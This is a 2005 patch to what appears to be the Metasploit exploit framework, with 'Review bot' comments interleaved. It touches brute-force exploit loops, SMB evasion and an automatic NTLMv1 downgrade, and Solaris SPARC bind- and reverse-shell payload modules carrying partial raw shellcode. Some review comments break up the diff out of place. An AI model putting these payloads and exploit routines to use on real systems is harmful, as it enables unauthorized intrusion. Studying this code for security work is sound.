From f468b10cff83e8bfb69aaa8a2305ddf5f11fcc88 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Sat, 31 Dec 2005 18:03:02 +0000
Subject: [PATCH] Tweaks

git-svn-id: file:///home/svn/incoming/trunk@3286 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/exploit/brute.rb | 3 +++
 lib/msf/core/exploit/brutetargets.rb | 2 +-
 lib/msf/core/exploit/smb.rb | 7 +++++--
 lib/rex/proto/smb/client.rb | 6 ++++++
 modules/encoders/sparc/optyx.rb | 2 +-
 modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb | 2 +-
 modules/payloads/singles/solaris/sparc/shell_find_port.rb | 2 +-
 .../payloads/singles/solaris/sparc/shell_reverse_tcp.rb | 4 ++--
 8 files changed, 20 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/brute.rb b/lib/msf/core/exploit/brute.rb
index 9c08044f0a..81587aeecb 100644
--- a/lib/msf/core/exploit/brute.rb
+++ b/lib/msf/core/exploit/brute.rb
@@ -87,6 +87,9 @@ module Exploit::Brute
 # Keep going until we run out of options
 while (curr.length != stopped.length)
+ # Stop brute forcing once a session is found
+ break if session_created?
+
 # Fire off an exploit attempt with the supplied addresses
 brute_exploit(curr)
diff --git a/lib/msf/core/exploit/brutetargets.rb b/lib/msf/core/exploit/brutetargets.rb
index 148ea0cf64..08a63930b1 100644
--- a/lib/msf/core/exploit/brutetargets.rb
+++ b/lib/msf/core/exploit/brutetargets.rb
@@ -21,7 +21,7 @@ def exploit(*args)
 targets.each_index do |i|
 next if i == 0
-
+ break if session_created?
 print_status("Trying target #{targets[i].name}...")
 exploit_target(targets[i])
 end
diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb
index d6c882e243..93b247c9d5 100644
--- a/lib/msf/core/exploit/smb.rb
+++ b/lib/msf/core/exploit/smb.rb
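Review bot: The new `break if session_created?` in brute.rb leaves the loop without saying why, so an exhausted address range and a found session look identical in the module output; a `print_status("Session created, stopping brute force")` immediately before the break would make the log readable. The brutetargets.rb hunk adds the same silent break, there replacing the blank line after `next if i == 0` and without the explanatory comment brute.rb carries; matching brute.rb with `# Stop trying further targets once a session is found` above the line keeps the two mixins consistent. `session_created?` is defined in neither hunk and presumably comes from a shared mixin, so its availability on every module that includes Exploit::Brute or the targets mixin is worth confirming. Both enclosing methods start and end outside their hunks.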
@@ -30,7 +30,7 @@ module Exploit::Remote::SMB
 register_advanced_options(
 [
- OptBool.new('SMBPipeEvasion', [ true, 'enable segmented read/writes for SMB Pipes', 'False']),
+ OptBool.new('SMBPipeEvasion', [ true, 'Enable segmented read/writes for SMB Pipes', 'False']),
 OptInt.new('SMBPipeWriteMinSize', [ true, 'Minimum buffer size for pipe writes', 1]),
 OptInt.new('SMBPipeWriteMaxSize', [ true, 'Maximum buffer size for pipe writes', 1024]),
 OptInt.new('SMBPipeReadMinSize', [ true, 'Minimum buffer size for pipe reads', 1]),
@@ -51,7 +51,10 @@ module Exploit::Remote::SMB
 end
 def connect()
- super
+
+ disconnect()
+
+ super
 self.simple = SIMPLE.new(self.sock, datastore['SMBDirect'])
diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb
index ea40253772..526448ba2a 100644
--- a/lib/rex/proto/smb/client.rb
+++ b/lib/rex/proto/smb/client.rb
@@ -622,6 +622,12 @@ EVADE = Rex::Proto::SMB::Evasions
 self.smb_send(pkt.to_s)
 ack = self.smb_recv_parse(CONST::SMB_COM_SESSION_SETUP_ANDX, true)
+
+ # The server doesn't know about NTLM_NEGOTIATE, try ntlmv1
+ if (ack['Payload']['SMB'].v['ErrorClass'] == 0x00020002)
+ return session_setup_ntlmv1(user, pass, domain)
+ end
+
 # Make sure the error code tells us to continue processing
 if (ack['Payload']['SMB'].v['ErrorClass'] != 0xc0000016)
 failure = XCEPT::ErrorCode.new
diff --git a/modules/encoders/sparc/optyx.rb b/modules/encoders/sparc/optyx.rb
index ad22ae28fc..97baf29db6 100644
--- a/modules/encoders/sparc/optyx.rb
+++ b/modules/encoders/sparc/optyx.rb
@@ -4,7 +4,7 @@ module Msf
 module Encoders
 module Sparc
-class LongXor < Msf::Encoder::Xor
+class LongXor < Msf::Encoder::XorAdditiveFeedback
 def initialize
 super(
diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
index fd59e582b6..09ce91fd2c 100644
--- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
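Review bot: `disconnect()` is now called unconditionally at the top of `connect()`, including on the first call when no socket exists yet; whether that is safe depends on `disconnect` tolerating a nil `sock` and `simple`, which the hunk does not show. A guard such as `disconnect() if self.sock` makes the intent explicit and avoids relying on that tolerance, and the two blank lines on either side of the call are out of step with the rest of the file. The reason for tearing down first — presumably so repeated `connect()` calls from the brute-force loops start from a fresh socket — deserves a comment such as `# Drop any prior connection so repeated connect() calls start clean`. The body of `connect()` continues past the hunk.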
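Review bot: The new branch falls back to `session_setup_ntlmv1` solely on the server-returned `ErrorClass` of 0x00020002, so any peer that answers with that status can push the exchange down to NTLMv1 without the caller noticing; the downgrade should at least be visible (a log line, or a flag the caller can inspect) and ideally opt-in rather than automatic. The literal `0x00020002` is unexplained in the hunk — a named constant next to the existing `CONST::` values, with a comment stating which SMB status it encodes, would make the check reviewable alongside the `0xc0000016` comparison below it. Whether `user`, `pass` and `domain` are the enclosing method's parameters cannot be confirmed here, since the method starts and ends outside the hunk.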
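Review bot: The class keeps the name `LongXor` while its superclass changes to `Msf::Encoder::XorAdditiveFeedback`, so the name no longer describes the encoding scheme it now inherits; either rename the class or add a comment above it such as `# Additive-feedback XOR encoder; class name kept for compatibility with existing references`. The rest of the class, including the `super(` argument list that begins at the end of the hunk, is outside the visible lines, so whether it still matches what the new base class expects cannot be checked here.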
@@ -25,7 +25,7 @@ module ShellBindTcp
 end
 def generate
- port = (datastore['RPORT'] || 0).to_i
+ port = (datastore['RPORT'] || '0').to_i
 payload = "\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" +
 "\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08" +
diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb
index 10c5b71c81..6714eaf40d 100644
--- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb
@@ -25,7 +25,7 @@ module ShellFindPort
 end
 def generate
- port = (datastore['CPORT'] || 0).to_i
+ port = (datastore['CPORT'] || '0').to_i
 payload = Rex::Arch::Sparc.set(port, "l0") +
 "\x9c\x2b\xa0\x07\x90\x1a\x80\x0a\xd0\x23\xbf\xe8\x90\x02\x20\x01" +
diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
index 6ce2d12415..b9bfc28cf6 100644
--- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
@@ -26,8 +26,8 @@ module ShellReverseTcp
 end
 def generate
- port = (datastore['RPORT'] || '0').to_i
- host = Rex::Socket.resolv_nbo_i(datastore['RHOST'] || '127.0.0.1')
+ port = (datastore['LPORT'] || '0').to_i
+ host = Rex::Socket.resolv_nbo_i(datastore['LHOST'] || '127.0.0.1')
 payload = "\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" +
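Review bot: Changing the fallback from `0` to `'0'` gives the `||` default the same type as the datastore value, but `to_i` still maps any non-numeric `RPORT` to 0 silently, so a mistyped option produces a payload built for port 0 with no error; `port = Integer(datastore['RPORT'] || '0')` would raise on malformed input instead. The shell_find_port.rb hunk has the identical `to_i` pattern on `CPORT`, and shell_reverse_tcp.rb on `LPORT`, so the same change applies there. `generate` continues past each of these hunks.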